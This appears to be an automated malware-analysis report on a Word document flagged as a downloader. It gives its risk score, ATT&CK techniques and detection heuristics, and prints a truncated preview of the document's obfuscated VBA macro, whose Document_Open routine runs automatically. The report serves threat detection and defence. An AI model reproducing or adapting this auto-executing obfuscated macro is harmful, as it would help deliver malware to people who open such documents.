MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is a Microsoft Word document containing a VBA macro that is automatically executed upon opening via the Document_Open subroutine. This macro utilizes a GetObject call, indicating an attempt to execute code or load external resources. The presence of a VBA macro and the Document_Open auto-execution strongly suggest a malicious downloader or dropper.
Heuristics 6
-
ClamAV: Doc.Downloader.Generic-7469262-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7469262-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13063 bytes |
SHA-256: 4bc68be9c2fca5d56d9f715a70f7fab5a0ed833679ed8c1786794d7a14e97821 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Fwbejxmnpj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Vkzimturjeenc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Igsepqmehcbg As Double
Dim Rdtprsexwwvk As Boolean
Ieoffsnrpvso = Jelhfrhtsx
Nlkwjelqvc = (Ahgaoxxcdsnsk)
Nnpmqzueb = 814
Dim Mocxrhqphxkh As String
Achvyrlwyxdg = "Vitae nemo."
Dim Wfcftvljagafc As Double
Dim Hdgkrpxnj As Boolean
Dim Hqpetkrstbu As Boolean
Jjrbbuspqpq = (329)
Dim Wzhystcfnutvm As String
Dim Jbemysahxvm As Double
Zqazkworku = Civpygpe
Dim Pldvevrkc As String
Dim Rfwuukpbw As Boolean
Dim Ulvkeszpx As Double
Sbovorsza = (Wlcyuevz)
Hirsauqzk = ("Voluptas dicta voluptas eveniet velit quia.")
Vlnvfywxjw = (Qpkhgxvtxhz)
Dim Xdnxbaqfubzp As Integer
Fzbtkiuacqm = Otlnmbbh
Hbxnnickfa
Dim Ypfkuntosohqg As Boolean
Dim Uuwuwqrisaix As Boolean
Smhocapyki = Yaxkzbgit
Vtihhnjlqpf = (Abeudvjo)
Rqlhbgrvqsv = 161
Dim Utilawyttzwk As Integer
Lexpcofqqvfif = "Et aut dolorem."
Dim Oifofkbvkjri As String
Dim Qoxcjgrscsxpd As Boolean
Dim Frrzaerrws As Double
Jnglglszhi = (175)
Dim Sbwfmqqhyiera As Double
Dim Uyxakwwhevhr As String
Dfxlugyhme = Flajplxr
Dim Khvawtrk As String
Dim Mwvdgffbvmmsu As Boolean
Dim Khvgwtmmcvp As Integer
Keqczgpjqxck = (Wlormmjlmveig)
Siqokrqwks = ("Annie")
Gujtvqwpandd = (Yruyraozxp)
Dim Vefpezyscrcb As Boolean
Jkifenkztzbm = Ehwuiausklj
End Sub
Attribute VB_Name = "Camxdyzasov"
Attribute VB_Base = "0{68A08007-2EAE-489F-919A-1C699FE87B53}{A0DE910C-662B-4B56-98C9-1ADFD1F10E64}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Zohvecnk"
Function Aqxdtbyhiyvx()
Dim Qgrtpykc As Double
Dim Whtrphlwlmia As String
Hjjrvjsswb = Fnlyuonnuoq
Ahnferqqilfo = (Maelslzcx)
Sunbottvwub = 609
Dim Skqzxbfjag As Integer
Qcydvyjbsl = "Soluta voluptatem sed accusantium dolorum est distinctio labore et maxime."
Dim Ptsmtwmk As Integer
Dim Tiuzewfdrnmp As Double
Dim Urbwrdugnnk As Integer
Tpeuprzjqi = (865)
Dim Nwotjqzvbrbv As Boolean
Dim Rxmvhoanlont As Integer
Yhejfcehfndxk = Bnjewzcwv
Dim Tzkafptcx As Integer
Dim Sqnokrzrkds As Boolean
Dim Aepzywkjix As String
Wfhndilmo = (Qipkxdqebraa)
Tdajeksd = ("Placeat voluptatibus natus.")
Mrdgugvvfly = (Mnfrtinveg)
Dim Ekcjlamzax As Boolean
Jjuwfupb = Ovysyvvthlqw
Usapwstupbld = Fwbejxmnpj.Vkzimturjeenc
Dim Jzerzexnxts As Double
Dim Vwkayxoxqsfp As Double
Sheqirwlow = Rxctseirazn
Uupshycsuegs = (Jyjioskfru)
Bgpjstivowhsh = 135
Dim Vxsvaquzt As Double
Ydlpduvhxvc = "At dolorem asperiores facere."
Dim Njhvmrrbrn As String
Dim Yywjhhwtb As String
Dim Kytmxzajt As Double
Iriymbyph = (207)
Dim Hfvyxqogrjsdw As String
Dim Eucrdvurqfai As Integer
Ummpnroqycjv = Xpnmbtxenqmbn
Dim Twhtlxxgo As Integer
Dim Fnwzhiiyt As Double
Dim Ohaxpzwdleal As Double
Cbayzjzdw = (Injdsotebi)
Ohxkkxbecrue = ("Clay")
Aurslkloh = (Atpghcxchm)
Dim Zogvjhqt As Integer
Lozmjwphaalxk = Yupwczujrs
Cinneipqscq = Usapwstupbld + Camxdyzasov.Ompxvrkfqlvl + Camxdyzasov.Ydootfwvx + Camxdyzasov.Oiuvdbgtedkjs
Dim Myfyslebmximg As Double
Dim Ntoytxjyf As Double
Ajldeoleezyh = Lttkiirwfw
Vozcaajxk = (Jsubcyhplpp)
Qnwgdeep = 659
Dim Tweczxyayqdjs As Boolean
Oxyghrfgv = "Garrett"
Dim Dcugqazvafx As Boolean
Dim Rmprqahvi As String
Dim Ggjcgnpjrlu As String
Racjwnbrb = (172)
Dim Ucopudsvcfz As Boolean
Dim Xpmpnewxqizq As String
Yuyxfquhezzpn = Uaspkmhbmdwtr
Dim Ozvgtbdhuuxq As String
Dim Pyrdxwigbol As String
Dim Muixdcklathz As Integer
Syvmwvnwefp = (Lhyhucirn)
Unacofkeafpig = ("Reiciendis cumque.")
Vfpqchjtzdc = (Wpyfmxsivl)
Dim Vktcvzrgfgdbx As Double
Ktaymsxikhk = Igathqgxq
Tuimwnybwuiad = Cinneipqscq + Camxdyzasov.Vwczvberfmi + Camxdyzasov
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.